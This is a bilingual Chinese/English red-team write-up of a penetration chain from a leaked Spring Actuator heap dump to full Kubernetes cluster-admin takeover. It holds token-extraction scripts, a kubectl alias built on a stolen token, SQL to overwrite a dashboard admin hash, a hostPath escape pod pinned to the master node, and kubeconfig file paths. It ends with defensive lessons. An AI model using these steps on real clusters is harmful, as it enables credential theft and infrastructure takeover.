内存泄漏导致集群接管 - From Memory Leak to cluster-admin Takeover


英文部分为中文的翻译,大部分由 ChatGPT 辅助翻译。(The English text is a translation of the Chinese, mostly assisted by ChatGPT.)

Intro (Avalanche) - 千里之堤溃于蚁穴

很显然,安全性问题往往只取决于微小的瑕疵,这次文章当你完整阅读后你会发现你以为的常规操作,配置方法,或者很常见的代码实践,会导致如此大的安全性隐患。

Security issues often begin with tiny flaws. After finishing this post, you will find that what you consider routine operations, configurations, or common coding practices can lead to serious hidden dangers.

TL;DR - 摘要

  1. Java mem dump 中云相关的凭据性泄漏 包括但不限于 alibaba Client AKSK, Mysql Client, Redis Client,Kubernetes [API] Client 等

Java memory dumps leaking cloud credentials (Spring Actuator heap dump), e.g., Alibaba Cloud client → Access Key / Secret Key, MySQL client → SQL account and password, Redis client → password (and a shell), Kubernetes API client → service-account token.

  2. 内存分析等杂项技巧在渗透测试中的应用

Memory leakage pairs with memory analysis: some misc tricks familiar from CTF have real-world uses in penetration testing.

  3. RBAC 宽松, 以及因此被滥用导致的信息泄漏与接管,包括但不限于可删减 pods 及其配置 外部数据库地址及其账密 云服务厂商 AKSK 凭据 高权限特殊权限 JWT 凭据等

Loose RBAC can cause information leaks and takeovers when the configured rules are abused, including but not limited to: deleting pods and reading their configuration, external database addresses and credentials, cloud provider AK/SK credentials, and high-privilege JWT tokens for other services.

  4. 脆弱的 DevOps 服务器或面板 例如 面板不安全的密码存储方式以及失败的鉴权,以及没有有效的命名空间隔离

Vulnerable DevOps services and dashboards, e.g., insecure dashboard password storage, broken authentication, and a lack of effective namespace isolation.

  5. 集群内部数据库对外开放,虽然这种行为通常来说不是什么严重的安全性问题,但是在一些信息泄漏的情况下,可以成为渗透至关重要的一部分。

In-cluster database exposure. Exposing a database port is usually not a severe problem by itself, but combined with leaked credentials it can become a crucial part of the penetration.

Attack Vectors - 攻击路径

En

graph TD;
    java_actuator_heapdump --> mem_analysis --> kubernetes_serviceaccount_token_RBAC_ConfigMaps
    api_server_exposure
    api_server_exposure & kubernetes_serviceaccount_token_RBAC_ConfigMaps --> configMaps
    configMaps --> database_secrets
    database_exposure 
    database_exposure & database_secrets --> devops_dashboard_backend_db
    devops_dashboard_backend_db --> add_or_change_admin_account --> devops_dashboard_takeover
    devops_dashboard_takeover --> watch_dashboard_self_serviceaccount --> kubernetes_serviceaccount_token_RBAC_NamespacedFullPriv
    kubernetes_serviceaccount_token_RBAC_NamespacedFullPriv & api_server_exposure --> create_AttackPod_mount_hostfs_/_at_master_container_escape --> get_cluster_admin_kubeconfig --> Takeover_Whole_Cluster

Zh

graph TD;
    Java执行器heapdump泄漏 --> 内存分析 --> kubernetes_serviceaccount_token权限是ConfigMaps
    apiserver暴露
    apiserver暴露 & kubernetes_serviceaccount_token权限是ConfigMaps --> configMaps
    configMaps --> 数据库高权限用户密码
    数据库端口暴露 
    数据库端口暴露 & 数据库高权限用户密码 --> 开发运维面板后端数据库
    开发运维面板后端数据库 --> 创建admin后门帐户或者修改admin帐户密码 --> 开发运维面板接管
    开发运维面板接管 --> 查看面板本身serviceaccount --> kubernetes_serviceaccount_token_当前命名空间所有权限
    kubernetes_serviceaccount_token_当前命名空间所有权限 & apiserver暴露 --> 创建AttackPod并挂载master节点hostfs的/目录后容器逃逸 --> 获取cluster-admin的kubeconfig --> 接管整个集群

Detail - 技术细节

EntryPoint - 入口 Heapdump

红队的进攻入口打点其实相当的重要。当然这里的入手点非常的简单啊。

The initial foothold of a red-team operation really matters. In this case, though, the entry point was very simple.

由于对方使用了所谓的 api gateway 一类的东西,我们可以在某一个页面下访问到对方某个管理服务的 Spring actuator ,其中暴露了 heapdump 的接口,但是没有其他的 restart 一类可以直接导致 RCE 的接口。 因此我们很快就可以拿到这个服务的堆内存导出。

Because the target sits behind some kind of API gateway, one of its pages let us reach the Spring Actuator of a management service. It exposed the heapdump endpoint, but none of the directly RCE-able endpoints such as restart. So we could quickly obtain a heap dump of that service.

Memory Analysis - 内存分析

我这里是直接使用的 MAT ,这是 JVM 内存性能分析的一款有效工具。

I used MAT (Eclipse Memory Analyzer), an effective tool for JVM memory performance analysis.

在分析中,我着重观察了几个敏感的凭据位置,通过搜索诸如 Client 对象和 Config 字段的对象,以及一些环境变量,来尝试获取对应的配置文件内容,密钥等信息。

During the analysis I focused on a few sensitive credential locations: searching for objects with keywords such as “Client” and “Config”, as well as some environment variables, to recover configuration file contents, passwords, and keys.

kubernetes service account 凭据可能会存在于 TokenFileAuthentication 的对象中 在 okhttp 的每次请求中 使用 getToken() 方法来拿到凭据

具体位置在 Kubernetes-Client/Java 项目中的这里

io/kubernetes/client/util/credentials/TokenFileAuthentication.java:71

因此我们可以得知在内存中存留的引用必然会在 heapdump 中暴露出这个对象的 Token。

Kubernetes service-account credentials may live in a TokenFileAuthentication object, whose getToken() method is called on every okhttp request to supply the credential. The exact spot is in the Kubernetes-Client/Java project, at line 71 of io/kubernetes/client/util/credentials/TokenFileAuthentication.java. Since the reference stays live in memory, the object's token will inevitably be exposed in the heapdump.
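As a quick illustration (not the exact workflow used here), a heap dump can be sifted for JWT-shaped strings even before opening MAT, since service-account tokens are base64url segments that always begin with eyJ. A minimal sketch on a synthetic dump fragment (the token below is fake):

```python
import re

# A JWT is three base64url segments joined by dots; the header
# always decodes from something starting with eyJ (i.e. '{"').
JWT_RE = re.compile(rb"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")

def find_jwts(blob):
    """Return all JWT-looking byte strings found in a raw heap dump."""
    return JWT_RE.findall(blob)

# Synthetic fragment mimicking a TokenFileAuthentication object in memory.
dump = b"\x00\x01TokenFileAuthentication\x00eyJhbGciOiJSUzI1NiJ9.eyJucyI6InByb2QifQ.c2ln\x00"
print(find_jwts(dump))
```

In practice MAT's OQL or string search does the same job with full object context; this is just the grep-style shortcut.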

这里我发现了三个凭据 和一些信息 总结如下

I found three credentials and some useful information, summarized below.

  • 使用了 k8s 集群 并且为该 pod 配置了服务账号,我们可以获取到 token 和其中的命名空间

The target runs a Kubernetes cluster, and this pod is configured with a service account, so we obtained the token and its namespace.

  • 集群内使用的是 Mysql 数据库同时得到了数据库凭据

MySQL runs inside the cluster, and we got its credentials.

  • 集群有集群内 Redis。Redis Client 泄漏了密码

The cluster also runs Redis, and the Redis client leaked its password.

  • Java net URI IP 一些对象泄漏了一些内部的 IP 尤其是 api server 所在的位置

java.net.URI objects leaked some internal IPs, notably the location of the API server.
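The service-account token recovered above is a JWT, so its namespace can be read straight out of the unverified payload. A minimal sketch using a synthetic token (the claim name matches the standard k8s service-account format):

```python
import base64
import json

def jwt_payload(token):
    """Decode the middle (payload) segment of a JWT without verifying it."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Synthetic token: header {"alg":"none"}, payload with a k8s-style namespace claim.
header = base64.urlsafe_b64encode(b'{"alg":"none"}').rstrip(b"=").decode()
payload = base64.urlsafe_b64encode(
    b'{"kubernetes.io/serviceaccount/namespace":"prod"}'
).rstrip(b"=").decode()
token = f"{header}.{payload}."

print(jwt_payload(token)["kubernetes.io/serviceaccount/namespace"])  # prints "prod"
```

Decoding without verification is fine here: we only want the claims the cluster itself put into the token, not to trust it.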

Let’s go Deep - 深入敌营

出于某种原因,我们可以直接的接触到对应的内网集群。虽然他在内网,但是内存中的一些内容的暴露以及 API gateway 处理不当在 http 响应中返回的 Backend-IP 头很轻松的可以让我知道具体的集群位置在哪里。

For certain reasons, we could reach the internal cluster directly. Although it sat on an internal network, the contents exposed in the memory dump, plus a Backend-IP header leaked in HTTP responses (an API gateway misconfiguration), made it easy to pinpoint the cluster's exact location.

RBAC Breaching - RBAC 违规

先进行简单的连接性测试,确认对方的 API 控制端口是否是可达的。6443 通常是 kubernetes API server 的端点,简单的 curl 6443 端口(当你不进行端口扫描时)一般情况我们应该的得到的返回的特征主要如下。

Without port scanning, start with a simple connectivity test to confirm the control-plane API endpoint is reachable. The Kubernetes API server typically listens on port 6443; a plain curl against that port should return fingerprints like the following.

  • -vvv 的情况下证书通常带有 kubernetes k3s 等字段 (https 请求)

With the -vvv flag, the certificate usually contains fields such as “kubernetes” or “k3s” (HTTPS request).

  • 在没有其他错误的时候,显示401 错误的 JSON

    When there are no other errors present, a JSON response with a 401 error is displayed.

    {
      "kind": "Status",
      "apiVersion": "v1",
      "metadata": {},
      "status": "Failure",
      "message": "Unauthorized",
      "reason": "Unauthorized",
      "code": 401
    }
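That 401 body is distinctive enough to fingerprint programmatically. A small sketch (field names taken from the response shown above):

```python
import json

def looks_like_kube_apiserver(body):
    """Heuristic: an unauthenticated Kubernetes API server answers with a
    v1 Status object carrying code 401 / reason Unauthorized."""
    try:
        data = json.loads(body)
    except ValueError:
        return False
    return (
        data.get("kind") == "Status"
        and data.get("apiVersion") == "v1"
        and data.get("code") == 401
        and data.get("reason") == "Unauthorized"
    )

resp = '{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}'
print(looks_like_kube_apiserver(resp))  # prints "True"
```

The same check is handy when sweeping a list of candidate IPs for exposed API servers without running a full port scan.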

既然我们已经拥有了服务账号的 token ,简单的将这个设置为环境变量 SAJWT 的值之后,创建一个 kubectl 的别名 k

Since we already have the service-account token, set it as the value of the environment variable SAJWT and create a kubectl alias k.

export SAJWT="<ServiceAccountJWT>"
alias k='kubectl --token=${SAJWT} --server=https://<target-api-server-ip>:6443 --insecure-skip-tls-verify=true'

这样,我们就得到了一个简易的和 api server 交互的 CLI Client.

This gives us a simple CLI client for interacting with the remote API server.

第一件事,就是检查我们所具有的权限。在这一阶段,我们不需要采用枚举不同的资源来确定是否存在对应的访问权限。一来是可能对资源的权限涵盖不全,二来我们或许无法枚举到额外的资源,诸如 CRD。

The first thing is to check what permissions we actually hold. At this stage we should not enumerate resources one by one to probe access: for one, such enumeration may not cover every resource's permissions; for another, we may be unable to enumerate additional resources such as CRDs.

kubectl 提供了一个非常好用的方法来帮助你得到权限。这里可以参考一下不错的文档。Cloud-Hacktricks

kubectl provides a command that lists your access rights; the Cloud-Hacktricks document is a good reference here.

k auth can-i --list [-n <namespace>]

在经过上面的操作后,我们可以得知这个泄漏 token 具有 configMap 的全部权限。

From the output of the command above, we learn that the leaked token has full access to ConfigMaps.

ConfigMaps Leak more - 配置文件泄漏一切

什么是 ConfigMap ?What is a ConfigMap?

ConfigMap 通常是作为集群内配置进行统一管理的一种资源,常常会被用来存放数据库密码 连接信息,在使用时通常是在程序中使用 k8s SDK 进行获取,也可以通过挂载将内容挂载进入文件的挂载点。 key 就是文件名,value 为文件内容。当然也可能会存在一些 AKSK

A ConfigMap is a resource for centrally managing in-cluster configuration, commonly used to store database passwords and connection information. Programs read it via the k8s SDK, or it can be mounted into a container as files: each key becomes a filename and each value the file content. Sometimes AK/SK credentials end up in it as well.
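To see why loose ConfigMap read access is dangerous, here is a hedged sketch that sifts dumped ConfigMap data for credential-looking entries (the ConfigMap names and keys below are invented for illustration):

```python
SUSPICIOUS = ("password", "passwd", "secret", "token", "access_key", "aksk")

def find_credentials(configmaps):
    """Return (configmap, key) pairs whose key name hints at a credential."""
    hits = []
    for cm_name, data in configmaps.items():
        for key in data:
            if any(s in key.lower() for s in SUSPICIOUS):
                hits.append((cm_name, key))
    return hits

# Hypothetical dump, shaped like the `data` fields of
# `kubectl get configmaps -o json`.
dump = {
    "app-config": {"application.yml": "server:\n  port: 8080\n"},
    "db-config": {"MYSQL_ROOT_PASSWORD": "********", "host": "mysql.prod.svc"},
}
print(find_credentials(dump))  # prints "[('db-config', 'MYSQL_ROOT_PASSWORD')]"
```

Key-name matching is only a first pass; values such as embedded application.yml files still deserve a manual read, which is where the findings below came from.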

在当前权限的 token 的 configmap dump 中,我发现在对应命名空间的 ConfigMap 中配置了数据库的 root 密码。这里泄漏了超多部分的内容,包括一部分外部数据库(主从同步)的账户密码等。

In the ConfigMap dump made with the current token, I found the database root password configured in the namespace's ConfigMaps. Far more leaked here, including account passwords for some external databases (master-slave replication).

Admin is me - 我才是管理员

现在所有的线索目前都指向了数据库。但是 3306 尝试失败了。所以简单的进行一波端口的扫描,发现开放了 33306 端口。33306 极有可能是那个程序员为了偷懒或者方便而进行反向代理的内部数据库的端口。如果这个猜想是成立的,那么我们可以通过之前获得的数据库凭据进行一手连接。

All the clues so far point to the database, but attempts to connect to port 3306 failed. A quick port scan then showed port 33306 open: very likely an internal database port that a programmer reverse-proxied out of laziness or convenience. If that guess holds, we can connect using the database credentials obtained earlier.

我承认我有赌的成分在里边,因为在扫描和扫描之前我就猜测对方程序员存在偷懒的可能,即故意通过配置静态的端口暴露对数据库端口进行暴露。而 k8s 默认是不会将任何 Pod 端口进行暴露的。

I admit there was some gambling involved: even before scanning, I guessed the programmers might have taken a shortcut and deliberately exposed the database through a statically configured port, since by default k8s does not expose any pod ports.
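That “lazy static port” guess corresponds to something like the following NodePort Service sketch. All names and labels here are hypothetical, and note that 33306 lies outside the default NodePort range of 30000-32767, so this also assumes an extended --service-node-port-range (a plain reverse proxy running on the node would achieve the same exposure differently):

```yaml
# Hypothetical Service statically exposing the in-cluster MySQL.
# nodePort 33306 requires kube-apiserver to run with an extended
# --service-node-port-range (the default is 30000-32767).
apiVersion: v1
kind: Service
metadata:
  name: mysql-external        # name and labels invented for illustration
  namespace: prod
spec:
  type: NodePort
  selector:
    app: mysql
  ports:
    - port: 3306              # in-cluster service port
      targetPort: 3306        # container port
      nodePort: 33306         # statically pinned external port
```

Either way, the effect is the same: a database that should be cluster-internal becomes reachable from outside on a predictable port.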

另外端口扫描确实是动静比较大,所以在可以不进扫描的时候,我会尽量避免这个行为。毕竟渗透讲究的是一个微操。

Moreover, port scanning is fairly noisy in network traffic, so I avoid it whenever possible. Penetration testing is, after all, about precise, minimal moves.

测试成功,这时候我们可以连接远程的数据库了,这时候我们是 root 权限的用户,拥有比先前内存转储中得到的凭据所有的权限都更全。

The test on 33306 passed: we can now access the remote database, as a root user with broader privileges than the credentials from the memory dump.

在多个数据库表中,我发现了一个存放有类似 kubernetes 面板的数据库,存放有类似 yaml 文件修改,执行 shell 类似字段的权限库,有类似权限绑定的绑定库,以及用户名密码的用户凭据库。

Among the databases, I found one that looks like the backend of a Kubernetes dashboard: a privilege table containing fields like “YAML edit” and “shell exec”, a role-binding table, and a table of user credentials.

其中凭据表只有一行,也就是 admin 用户,经过 kali hash-identifier 工具的检查,大概确认是 sha256 后的密码,不过不确定是否加了盐。接着通过目录爆破和关键字搜索,我找到了面板的具体位置。

The credential table held a single row: the admin user. Kali's hash-identifier suggested the password was a SHA-256 hash, though I could not tell whether it was salted. Meanwhile, directory brute forcing and keyword searching revealed the dashboard's location.

尝试爆破密码,但是跑完了整个 rockyou.txt 都没有跑出来这个密码,那多半不是什么弱密码了。于是另辟蹊径,在密码备份后,修改掉了 admin 的帐户密码,然后尝试创建一个 sha256 后用新密码进行登录,同时这一步也可以测试是否数据库密码进行了加盐。

Brute-forcing the hash against the entire rockyou.txt failed, so it was probably not a weak password. I took another route: after backing up the original hash, I replaced the admin account's password with the SHA-256 of a new password and tried logging in with it. This step also tests whether the stored hashes are salted.
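The password swap boils down to a single UPDATE. A minimal sketch (the table and column names are guesses for illustration; read the real ones from the schema first):

```python
import hashlib

def reset_admin_sql(new_password):
    """Build the UPDATE that replaces admin's stored hash with
    sha256(new_password). This only works if the dashboard stores
    unsalted sha256, which is exactly what the login test probes."""
    digest = hashlib.sha256(new_password.encode()).hexdigest()
    # 'users' / 'pass_hash' are hypothetical names; adapt to the real schema.
    return f"UPDATE users SET pass_hash = '{digest}' WHERE username = 'admin';"

print(reset_admin_sql("abc"))
```

If the subsequent login succeeds, you have confirmed both the takeover and the unsalted storage in one move; if it fails, a salt (or pepper) is likely involved and the original hash should be restored from the backup.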

最后我们成功的登录上了 admin 的帐户。 Dashboard 管理还是很全的,例如执行 shell 和管理 pod 之类的功能。

Finally, we successfully logged in to the admin account. The dashboard offers a full set of management features, such as executing shell commands and managing pods.

Not the End - 还没结束

虽然我们已经通过这种方法拿下了部分集群的权限,只是一个 namespace 的全部权限但是没有整个集群的权限。因此我们还需要进一步的提升和巩固自己的权限。 而 dashboard 本身具有的管理功能通常是通过其中配置的 serviceaccount 的权限。所以思路其实非常清晰,直接通过 shell 交互,找到面板自己的 service account 凭据,滥用凭据创建 pod ,pod 中挂载 host 下的 / 目录并且将 pod 指向到集群的 master 节点,拿下 master 上的 kubeconfig 文件。

Although we have gained some cluster permissions through this method, it is only full permissions for a single namespace and not the entire cluster. Therefore, we need to further escalate and consolidate our privileges. The management functions that the dashboard has are usually granted through the service account permissions configured within it. So the idea is clear - we can directly use shell interaction to find the dashboard’s service account credentials, abuse the credentials to create a pod, mount the host’s root directory within the pod, and then direct the pod to the master node of the cluster to obtain the kubeconfig file from the master node.

这一类技巧在 hacktricks-cloud 中有详细描述。而我优化了这一部分的攻击逻辑。 增加了 node selector 这种指定 pod 调度到某个节点的操作。顺手给提了一个 PR hacktricks-cloud#7。(k8s 本身是随机选择合适的节点调度的,而 nodeSelector 可以保证调度到符合指定条件的节点,而我们所在的 k8s 集群,事后查看面板发现大约有七个节点。)

This kind of technique is described in detail in hacktricks-cloud. However, I optimized the attack logic here by adding a nodeSelector, which pins the pod's scheduling to a specific node, and submitted a PR for it along the way: hacktricks-cloud#7. (Kubernetes itself picks a suitable node on its own, while nodeSelector guarantees scheduling onto nodes matching the given criteria; after taking over the whole cluster, we found from the dashboard that it had about seven nodes.)
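The escape pod described above might look like the following sketch. The pod name, image, and node label are placeholders; the real master label should be confirmed with `kubectl get nodes --show-labels`:

```yaml
# Hypothetical attack pod mounting the master node's root filesystem.
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod                # placeholder name
spec:
  nodeSelector:
    # A typical master label; verify the actual one on the target cluster.
    node-role.kubernetes.io/master: ""
  containers:
    - name: shell
      image: alpine               # any image with a shell works
      command: ["sleep", "infinity"]
      volumeMounts:
        - name: hostfs
          mountPath: /host        # the master's / appears under /host
  volumes:
    - name: hostfs
      hostPath:
        path: /
```

After the pod is running, `kubectl exec` into it and read files under /host, e.g. /host/etc/kubernetes/admin.conf, to pull the cluster-admin kubeconfig off the master.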

至于如何列出当前用户权限所有的凭据信息或者拿到 kubeconfig 文件,可以查看常见的文件点位,例如 /etc/kubernetes/admin.conf /etc/kubernetes/controller-manager.conf 以及 /etc/rancher/k3s/k3s.yaml 和 ~/.kube/xxxxx 这类的文件,或是使用命令类似 kubectl config view --raw 。这里 hacktricks 文档并没有写,下次有空了,再交个 PR。

To enumerate the credentials available to the current user or to obtain a kubeconfig file, check commonly used locations such as /etc/kubernetes/admin.conf, /etc/kubernetes/controller-manager.conf, /etc/rancher/k3s/k3s.yaml, and ~/.kube/xxxxx, or run something like kubectl config view --raw. The hacktricks documentation does not cover this yet; I may submit another PR when I have time.

Everything End - 尾声

接下来我们就可以把最高权限的 admin 帐户或是系统类最高权限帐户,导入我们的 Lens k9s 一类的 kubernetes 管理工具,进行持久化和管理,享受他们给你带来的便利。你懂的,一切的管理工具都可以是黑客工具。全都可以炸完!(可莉脸)

With the highest-privileged admin account or a system-level account, we can import it into Kubernetes management tools like Lens or k9s for persistence and day-to-day management, enjoying the convenience they bring. You know, every management tool can be a hacking tool. They can all be exploded! (Klee face)

Conclusion - 总结

查看整个渗透测试的路径和思路,你会发现这里只有三个非常重要的独立于其他的初始条件,一个是 java 的内存泄漏,这是一切的开始,第二个是 kubernetes 控制 api 可以控制,第三个是主动暴露出来的数据库端口。然而,这些条件大部分在很多开发者写的代码和实际集群的配置中非常的常见,往往却是最容易被忽视的。

Looking at the entire penetration path and approach, you will find only three crucial initial conditions independent of everything else: first, the Java memory leak, which started it all; second, the reachable Kubernetes control API; and third, the deliberately exposed database port. Yet these conditions are extremely common in real-world code and cluster configurations, and they are the ones most easily overlooked.

当然这一整个集群最为核心的问题在于 dashboard。dashboard 数据库的配置存放于 configmap 中,而 configmap 是可以直接被具有 configmap 权限的 service account 读取的,而 spring cloud app 通常会具有该权限。又由于错误地把 dashboard 部署在了生产 namespace,导致 dashboard configmap 混合在其他生产 configmap 中,从而使得攻击者可以完成一套从内存泄漏到 cluster-admin 接管的完整攻击链。多种缺陷综合在一起导致了这一次的严重的安全问题。

The core problem of the whole cluster lies in the dashboard. Its database configuration is stored in a ConfigMap, which can be read directly by any service account holding ConfigMap permissions, a permission Spring Cloud apps often have. Because the dashboard was mistakenly deployed in the production namespace, its ConfigMap was mixed in with the production ConfigMaps, letting an attacker complete a full attack chain from memory leak to cluster-admin takeover. Multiple flaws combined to create this serious security problem.


Take care of your cluster, and be well. 👆😎